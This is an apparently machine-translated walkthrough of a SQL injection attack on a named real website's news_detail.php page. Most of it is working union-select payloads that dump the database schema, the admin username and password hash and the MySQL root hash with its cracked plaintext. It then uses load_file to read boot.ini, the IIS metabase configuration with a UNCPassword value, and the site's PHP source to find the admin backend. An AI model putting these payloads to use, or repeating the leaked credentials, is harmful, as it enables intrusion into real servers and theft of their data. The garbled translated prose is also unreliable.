-
Php_mysql inject Load_file () IIS configuration file Get
Let's look at an injection point:
http://www. . Cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat (Database (), 0x5c,user (), 0x5c,version ()), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 Get Echo: flier_dbase\[email protected]\5.0.22- community-nt If the injection point is the first vulnerability, then this root is the administrator made a second Web site vulnerability : http://www. . Cn/news_detail.php?newsid=1+union+select+1,2,3,4,5,6,group_concat (Distinct+table_name), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_schema= 0x666c6965725f6462617365 Get Data: Pub_config,pub_tree,pub_webmaster,web_img,web_keys,web_ly,web_news,web_news_ review pub_webmaster field: http://www. . Cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,group_concat (Distinct+column_name), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_name= 0x7075625f7765626d6173746572 Get data: Webmasterid,username,userpwd,loginnum,ip,lasttime,tree,name,dtime,sex, jobs this out. Administrator data: http://www. . cn/nEws_detail.php?newsid=-1+union+select+1,2,3,4,5,6,group_concat (DISTINCT+USERNAME,0X5F,USERPWD), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+pub_webmaster Get: Admin_9b45d683e499e7bdyfh_ 7a57a5a743894a0e//here is the third loophole, weak password admin since can not find the background address, then simply burst MySQL administrator password http://www. . Cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat (User,password), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user Get Data: root* CB26B0546CADD30FC2432C095A6A3D54FA3C2FFD database on an account, if the solution is not open, would you like to give up? That's no better than, first, I untied, for the eight-digit alphanumeric signed password, the school's distributed password-cracking system without straining to say. But this password is eight-bit letter plus sign, but also not weak password, for the moment is not a loophole. *cb26b0546cadd30fc2432c095a6a3d54fa3c2ffd corresponding to the clear text is QWEASD) @ Second, we have other ways, casually access a path, feedback is IIS6 404 default page, Description of the site server is: Windows+iis6+php+mysql environment first C:\\Boot.ini This string path hex code to get: 0x633a5c5c626f6f742e696e69 then, http://www. . Cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file (0x633a5c5c626f6f742e696e69), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 See echo: [boot loader] timeout=30 default=multi (0) disk (0) Rdisk(0) partition (1) \ Windows [operating systems] multi (0) disk (0) rdisk (0) partition (1) \windows= "WINDOWS Server 2003, Enterprise "/fastdetect/noexecute=optout Although can load_file load files, but seems to be of little use. Not also, since it is IIS6, then load c:\\windows\\system32\\inetsrv\\metabase.xml This path can get the site configuration information. * Note: Windows file operation, the path must be double slash, if it is a single slash, probably will load_file failure, to explore the reason, probably because, the slash is such a \ left upper right lower, and Linux is/right upper left. If you follow the path slash behind Windows with a T, which is \ t, see what's in programming? What if \ nthe? \ ' Where? Yes, the slash on the path is gone. If it is a double slash, \ \ That is the true single slash. If you need to output a double slash, then you have to use four slash to indicate, depressed not? \\\\ final injection sentence is: http://www.fly-er.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file ( 0X633A5C5C77696E646F77735C5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 get echo the following: mainly look at these few sentence configuration:?
1234567891011121314 |
<IIsWebServer Location =
"/LM/W3SVC/2125961364"
AuthFlags=
"0"
LogExtFileFlags=
"LogExtFileDate | LogExtFileTime | LogExtFileClientIp | LogExtFileUriStem | LogExtFileUriQuery | LogExtFileHttpStatus | LogExtFileWin32Status | LogExtFileServerPort | LogExtFileUserAgent | LogExtFileHttpSubStatus"
LogFileDirectory=
"E:\flylog"
LogFileLocaltimeRollover=
"FALSE"
LogFilePeriod=
"1"
LogFileTruncateSize=
"20971520"
LogPluginClsid=
"{FF160663-DE82-11CF-BC0A-00AA006111E0}"
ServerAutoStart=
"TRUE"
ServerBindings=":
80
:fly-er.com.cn
:
80
:www.fly-er.com.cn"
ServerComment=
"fly-er.com.cn"
>
</IIsWebServer>
|
And also:?
123456789101112 |
<IIsWebVirtualDir Location =
"/LM/W3SVC/2125961364/root"
AccessFlags=
"AccessRead | AccessWrite | AccessScript"
AppFriendlyName=
"默认应用程序"
AppIsolated=
"2"
AppRoot=
"/LM/W3SVC/2125961364/Root"
AuthFlags=
"AuthAnonymous | AuthNTLM"
DefaultDoc=
"yindao.html,index.html,index.php,Default.htm,Default.asp,index.htm"
DirBrowseFlags=
"DirBrowseShowDate | DirBrowseShowTime | DirBrowseShowSize | DirBrowseShowExtension | DirBrowseShowLongDate | EnableDefaultDoc"
Path=
"F:\web\2010716\new_flyer"
UNCPassword=
"49634462500000000600000040000000894077f761d33600623e24d0e5dfbe254f63ee6490a3af6f918760ac2fbd00627e07669149f74641659a4383366f9edefd9c02f6555c8692c1c93d2483008b9721cbdae4fac9a380"
>
<
/IIsWebVirtualDir
>
|
Here we construct: http://www. . Cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file ( 0x463a5c5c7765625c5c323031303731365c5c6e65775f666c7965725c5c696e6465782e706870), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 Right-click to view the source code. * Note: Load_file when used, it is best to add a hex outside: Hex (load_ File (xxxxxxx)) Because I have encountered a website, the home page does not know where the code is problematic, injecting points on the home page. I use the homepage load_file homepage file, outside the nested hex, the homepage is circulated, is similar to this: index inside has a iframe,iframe load is index This file, index this file inside the IFRAME again load Index this file, which goes on and on until the machine resources are exhausted. Although it is not known that the site is not this iframe, but such nesting does have a dead loop, so it is recommended that hex nested load_file I am more concerned about the index inside such a place code:?
12345 |
require( ‘admin_flier/common/function.php‘ ); require( ‘admin_flier/lib/class/form.class.php‘ ); require( ‘admin_flier/lib/class/db.class.php‘ ); require( ‘admin_flier/lib/class/page.class.php‘ ); include( ‘inc/head.php‘ ); |
Oh, this is not the back office address? Clearly, there is not enough security in the background. Even if the background address is hidden, the tool can not be swept, it does not mean to relax the security of the background it?
Php_mysql Injection Load_file () IIS configuration file get